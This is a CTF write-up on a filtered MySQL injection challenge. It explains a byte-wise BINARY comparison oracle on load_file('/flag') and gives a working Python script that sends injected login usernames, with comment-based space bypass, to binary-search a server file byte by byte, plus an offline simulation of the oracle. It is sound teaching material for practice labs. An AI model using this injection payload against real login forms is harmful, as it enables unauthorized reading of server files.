The challenge filtered union and a large number of SQL functions; the intended solution was to read a file. I was too impatient at the time and didn't get it, so I'm reviewing it now. The script is simple. It relies on string comparison: with a binary cast MySQL compares strings byte by byte in ASCII order, and a longer string that starts with a shorter one compares greater than it, so comparing the file contents against a guessed prefix leaks one bit per query, e.g.:
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
Building on this logic it's easy to write a binary search: for each position, find the largest byte b for which load_file('/flag') >= known_prefix + b still holds; that b is the next byte of the file, and it costs about eight queries per byte instead of one per candidate value.
Let's go straight to the code.
import requests

url = 'http://localhost/index.php'

def func(x):
    # use comments as separators so the payload also works if spaces are filtered
    x = x.replace(' ', '/**/')
    return x

flag = ''

def check(mystr):
    # binary forces a byte-wise comparison; the page answers 'success' when the
    # comparison is true, so each request leaks one bit about the file
    username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
    username = func(username)
    username = username.format(mystr)
    password = 'hack'
    r = requests.post(url=url, data={'username': username, 'password': password})
    return 'success' in r.text

for i in range(1, 20):
    left = 0
    # the flag is assumed to be ASCII: requests UTF-8-encodes a Python 3 str,
    # so a character above 0x7f would be sent as two bytes and not compare as one
    right = 127
    while left < right:
        mid = (left + right + 1) >> 1
        # the largest byte b with flag+b <= file is the next byte of the file
        if check(flag + chr(mid)):
            left = mid
        else:
            right = mid - 1
    if left == 0:
        # no byte satisfied the comparison: flag already equals the whole file
        break
    flag += chr(left)
    print(flag)
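Added example (not part of the original write-up): an offline simulation of the same oracle, so the comparison logic and the search can be checked without a target. It replaces the HTTP request with a function that compares constructed sample bytes the way MySQL compares BINARY strings, and extends the script's loop with an explicit end-of-file check: once the recovered prefix equals the whole file, no appended byte can satisfy the >= comparison, which is how the dump knows to stop. The file contents and the query count are properties of the constructed sample, not of the challenge.

```python
from typing import Callable, Optional, Tuple

# Constructed sample standing in for the contents of /flag on the target.
FILE_CONTENT = b"flag{Binary_Search_By_Bytes}\n"

Oracle = Callable[[bytes], bool]


def make_oracle(content: bytes) -> Oracle:
    """Simulates the one bit the login form leaks per request: whether
    `binary (select load_file('/flag')) >= '<candidate>'` is true.

    A BINARY comparison in MySQL behaves like comparing Python bytes: the
    first differing byte decides, and a longer string with an equal prefix
    compares greater than the shorter one.
    """
    return lambda candidate: content >= candidate


def next_byte(oracle: Oracle, prefix: bytes) -> Optional[int]:
    """Binary-searches the largest b such that oracle(prefix + b) holds.

    Because prefix is known to be a prefix of the file, prefix + b is <= the
    file exactly when b <= the real next byte, so the largest b that passes
    is the next byte. If prefix is already the whole file, every prefix + b
    is greater than the file, no b passes, and None signals end of file.
    """
    left, right = 0, 255
    while left < right:
        mid = (left + right + 1) >> 1
        if oracle(prefix + bytes([mid])):
            left = mid          # mid is still <= the real byte
        else:
            right = mid - 1     # mid is too large
    # left is only ever assigned after a true answer, except when it never
    # moved off 0; that single case needs one confirming query.
    if left == 0 and not oracle(prefix + b"\x00"):
        return None
    return left


def dump_file(oracle: Oracle, max_len: int = 4096) -> bytes:
    """Recovers the file byte by byte, stopping at end of file."""
    recovered = b""
    while len(recovered) < max_len:
        b = next_byte(oracle, recovered)
        if b is None:
            break
        recovered += bytes([b])
    return recovered


def count_queries(content: bytes) -> Tuple[bytes, int]:
    """Runs the dump against a counting oracle; returns (bytes, query count).

    The same wrapper could be put around the real check() to measure how
    many requests a dump of the target costs.
    """
    calls = 0
    real = make_oracle(content)

    def counting(candidate: bytes) -> bool:
        nonlocal calls
        calls += 1
        return real(candidate)

    return dump_file(counting), calls


if __name__ == "__main__":
    data, n = count_queries(FILE_CONTENT)
    print(data, n)
```

Each byte costs exactly 8 queries (the search halves 256 candidates down to one), and the terminating probe costs 8 plus the confirming query. The simulation also shows why the payload casts with binary: under a case-insensitive default collation such as utf8_general_ci, 'a' and 'A' compare equal, so the search could not tell the two cases of a letter apart and the recovered text would lose its case.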